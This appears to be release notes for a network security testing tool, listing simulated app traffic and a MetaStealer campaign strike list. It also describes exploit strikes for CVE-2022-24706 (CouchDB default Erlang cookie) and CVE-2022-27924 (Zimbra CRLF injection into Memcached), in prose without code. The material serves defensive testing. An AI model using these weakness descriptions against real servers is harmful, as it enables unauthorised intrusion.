| Name | Category | Info |
|---|---|---|
| Box REST API | Data Transfer/File Sharing | Box is a cloud file-sharing application that offers REST API utilities for distributed file sharing. This simulates Box file upload action using a pre-authenticated developer token. |
| Doordash Oct 2022 | Social Networking/Search | Doordash is a food ordering and delivery app. |
| Snapchat Web Oct22 | Social Networking/Search | Snapchat is a free social media application that lets users send each other text messages and "snaps", which are messages embedded in images. |
| Uber Oct 2022 | Social Networking/Search | Uber is a mobility as a service provider allows users to book cars. |
| Name | Category | Tags | Info |
|---|---|---|---|
| Doordash Oct 2022 | Social Networking/Search | Web SimulatedTLS |
Doordash is a food ordering and delivery app. This simulates the scenario where a user opens Doordash app on an iOS device, browses through home, searches for a restaurant and opens food listings. |
| Snapchat Web Oct22 | Social Networking/Search | Voice/Video/Media Chat/IM HTTP/2 |
Simulates the use of the Snapchat application as of September 2022 where a user opens the website, logs in, sends a text message, and a "snap" message. |
| Snapchat Web Bandwidth Oct22 | Social Networking/Search | Voice/Video/Media Chat/IM HTTP/2 |
Simulates the use of the Snapchat application as of September 2022 where a user sends a text message and a "snap" message. |
| Snapchat Web Send Text Message Oct22 | Social Networking/Search | Voice/Video/Media Chat/IM HTTP/2 |
Simulates the use of the Snapchat application as of September 2022 where a user logs in and sends a text message. |
| Twitch Mar18 - HTTP/2 | Voice/Video/Media | HTTP/2 | Simulates the use of Twitch.tv as of March 2018 over HTTP/2. The user loads the twitch.tv page, selects the Browse button and then lists the available Top Channels from which a channel is selected and played. |
| Uber Oct 2022 | Social Networking/Search | Web SimulatedTLS |
Uber is a mobility as a service provider allows users to book cars. This simulates the scenario when a user opens uber app on an iOS device, searches for a pickup and drop locations and books a ride. |
| Name | Info |
|---|---|
| Sandvine 2022 Global Social | It simulates the downstream traffic generated by the top 10 social media applications reported in the Sandvine Global Internet Phenomena Report January 2022. Here the weights are extrapolated from the GLOBAL APP TRAFFIC SHARE table present in the report. |
| Name | Info | ||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| MetaStealer Mar 2022 Campaign | This strike list contains 4 strikes simulating the 'MetaStealer Mar 2022 Campaign'. 1. The first strike simulates a phishing email that has been seen in the wild pushing MetaStealer malware. This specific phishing attempt is related to the 'MetaStealer Mar 2022 Malware Campaign', and it tries to trick the user into clicking a malicious Excel document with an embedded macro in order to download the malware. 2. The second strike simulates the HTTPS traffic that gets generated after the malware is executed in the 'MetaStealer Mar 2022 Malware Campaign'. Once the Excel macro has been executed, the malware sends an HTTPS request to github to download a malicious non compressed data binary. 3. The third strike simulates the HTTPS traffic that gets generated after the malware is executed in the 'MetaStealer Mar 2022 Malware Campaign'. Once the persistent executable is run, the malware sends an HTTPS request to download a malicious reverse byte Windows DLL. 4. The fourth strike simulates the 'MetaStealer Mar 2022 Malware Campaign' Command and Control HTTP traffic. Once the persistent executable is run, the malware sends an HTTPS request to download a malicious reverse byte Windows DLL as well as an HTTP GET request to the same URI which is represented in this strike. After the malicious MetaStealer DLL is loaded, several HTTP GET requests are sent to an external server. The first HTTP request retrieves a base64 encoded Windows DLL. Then two more HTTP requests a GET and POST are sent to external servers to update status and wait for additional commands. It contains the following sequence of strikes: 1) /strikes/phishing/metastealer_mar_2022_campaign_phishing_email.xml 2) /strikes/malware/apt/metastealer_mar_2022_campaign/metastealer_mar_2022_malware_retrieval.xml 3) /strikes/botnets/apt/metastealer_mar_2022_campaign/metastealer_mar_2022_dll_retrieval.xml 4) /strikes/botnets/apt/metastealer_mar_2022_campaign/metastealer_mar_2022_campaign_command_control.xml
|
| CVSS | ID | References | Category | Info |
|---|---|---|---|---|
| 10.0 | E22-edky1 | CVE-2022-24706CVSSCVSSv3CWE-1188URL | Exploits | This strike exploits an authentication bypass vulnerability in Apache CouchDB. The vulnerability is due to the presence of a default Erlang cookie used for cluster node authentication. A remote, unauthenticated attacker could exploit this vulnerability by using the default Erlang cookie to access the CouchDB cluster node. Successful exploitation of this vulnerability could allow the attacker to bypass authentication and perform arbitrary actions with administrative privileges. *NOTE: While running this strike in One-Arm mode, a file /tmp/test.txt is created on the server. |
| 5.0 | E22-eg2c1 | CVE-2022-27924CVSSCVSSv3CWE-93URL | Exploits | This strike exploits a CRLF(Carriage Return followed by Line Feed) Injection vulnerability in the Zimbra Collaboration server. This vulnerability is due to insufficient sanitization of CRLF characters in HTTP Request-URIs and HTTP header values when performing route caching using Memcached. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could allow an attacker to inject arbitrary Memcached commands which would be executed by the server. |
| Component | Info |
|---|---|
| Apps | HTTP/2 tag was added to Twitch Mar 18 superflow. |
| Component | Info |
|---|---|
| Apps | Updated the description of Transaction Flag parameter. |
| Security | Fixed the 'no implicit conversion of string to integer' error when running FileTransfer and Malware strikes with evasion profile modified to use HTTP protocol. |